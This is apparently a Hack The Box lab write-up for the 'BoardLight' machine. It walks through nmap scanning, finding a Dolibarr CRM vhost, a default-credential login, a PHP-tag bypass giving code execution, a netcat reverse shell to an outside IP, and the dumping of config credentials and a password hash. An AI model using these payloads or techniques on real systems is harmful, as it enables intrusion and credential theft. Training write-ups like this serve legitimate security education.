BoardLight

Enumeration
nmap -v -A -O -p- -Pn boardlight.htb -oN nmap
Nmap scan report for boardlight.htb (10.10.11.11)
Host is up (0.051s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=6/7%OT=22%CT=1%CU=38364%PV=Y%DS=2%DC=T%G=Y%TM=66631
OS:D7C%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=101%TI=Z%CI=Z%II=I%TS=A)O
OS:PS(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CS
OS:T11NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)E
OS:CN(R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F
OS:=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z
OS:%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=
OS:N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%
OS:CD=S)
Uptime guess: 0.076 days (since Fri Jun 7 14:58:20 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 5900/tcp)
HOP RTT ADDRESS
1 51.51 ms 10.10.14.1
2 51.85 ms boardlight.htb (10.10.11.11)
NSE: Script Post-scanning.
Initiating NSE at 16:47
Completed NSE at 16:47, 0.00s elapsed
Initiating NSE at 16:47
Completed NSE at 16:47, 0.00s elapsed
Initiating NSE at 16:47
Completed NSE at 16:47, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.35 seconds
Raw packets sent: 65723 (2.896MB) | Rcvd: 66121 (2.754MB)
Port 80

It appears to be a simple showcase site, and even a directory scan with ffuf
returns nothing.
Trying to scan vhosts always with ffuf we get nothing. This is very strange... 🤔
Let's go back to the homepage and see if we can extract additional information such as employees, additional domain names, etc.
In the footer we see that the domain name is not boardlight.htb
but board.htb
:

At this point trying to run a new scan of possible vhosts immediately ffuf returns something super interesting:

Adding crm.board.htb
to /etc/hosts and visiting the URL we will reach a login page 👍

This is the login page of Dolibarr ERP/CRM which is an Open source modular software that suits small and medium-sized enterprises (SMEs), foundations and freelancers.
Foothold
Trying admin:admin
credentials we can enter in a sort of restricted area of CRM:

But is still possible to create website and under each website a test page. In fact, if we create a new website and create a blank page with some HTML code this will be visible from the browser:

By clicking on the preview symbol to the right of the page :binocul or by reaching the correctly set URL, the created page can be viewed:

The juiciest and most interesting thing of all though is that it is possible to create pages with dynamic content in other words with PHP code that could get us a reverse shell.
But if we try to enter some PHP code using the classic tag we obtain the following error:

The good news, however, is that there is a vulnerability that allow us to easily bypass this restriction and the reference is this one:

Easy Peasy! 👋

This is the payload used to exec some shell commands on backend:
<?PHP $output = shell_exec('which python');echo "<pre>$output</pre>";?>
List files in the current working directory:


We can list the users on the machine and we will find larissa:

Verify if some useful binaries exists:


after several attempts we finally find the reverse shell working and get a session in pwncat:
<?PHP system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.15.101 9999 >/tmp/f");?>
Googling (https://wiki.dolibarr.org/index.php?title=Configuration_file) we find that Dollibarr's configuration file is in conf/conf.php
as shown in the figure:

And the first credential set appear magically 🪄:

dolibarrowner
<--> serverfun2$2023!!
Privilege Escalation (user)
The first idea was to enumerate further by checking for other users within the MySQL database:

With show tables;
we can list the tables present in this database:

llx_user
is the most interesting table but difficult to read using the reverse shell:

If we copy this output to a mysql editor formatter like this one we can easily read the password hashes and users:

dolibarr $2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm
It's a Blowfish hash type:

Try to crack it using Hashcat is a fail ⛔
Instead if we simply try to SSH with this password as larissa
user enumerated before we obtain the user flag:

Privilege Escalation (root)
Download linpeas.sh
under /tmp
and start it:

After trying several different avenues (from port 33060 open only in localhost to the different CVEs listed but not compatible with the Ubuntu Focal 21.04 version of the machine) and many hours of reviewing linpeas output came enlightenment! 💡

Using the exploit found on GitHub we can obtain the root flag 🎉

Last updated